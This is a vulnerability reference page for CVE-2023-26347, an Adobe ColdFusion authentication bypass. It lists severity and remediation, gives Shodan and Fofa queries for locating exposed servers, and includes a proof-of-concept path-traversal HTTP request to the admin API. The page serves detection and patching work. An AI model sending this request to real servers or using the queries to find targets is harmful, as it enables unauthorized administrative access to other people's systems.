🔙 목록으로 돌아가기

CVE-2023-26347: Adobe Coldfusion - Authentication Bypass

TitleAdobe Coldfusion - Authentication Bypass
Authorsalts
SeverityHigh
ImpactUnauthenticated attackers can bypass access controls to access Adobe ColdFusion administration endpoints, potentially allowing full control over the ColdFusion server and access to sensitive application data.
RemediationUpgrade to Adobe ColdFusion 2023.6 or 2021.12 or later versions that address this access control vulnerability.
CVSS Score7.5
EPSS Score0.85696
CVE IDCVE-2023-26347
CWE IDCWE-284
Shodan Queryhttp.component:"Adobe ColdFusion"http.component:"adobe coldfusion"http.title:"coldfusion administrator login"cpe:"cpe:2.3:a:adobe:coldfusion"
Fofa Queryapp="Adobe-ColdFusion"app="adobe-coldfusion"title="coldfusion administrator login"
Tags cve2023 cve adobe coldfusion auth-bypass vkev vuln

🔍 Vulnerability Description

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.

🌐 HTTP Request

GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-26347.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-26347.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A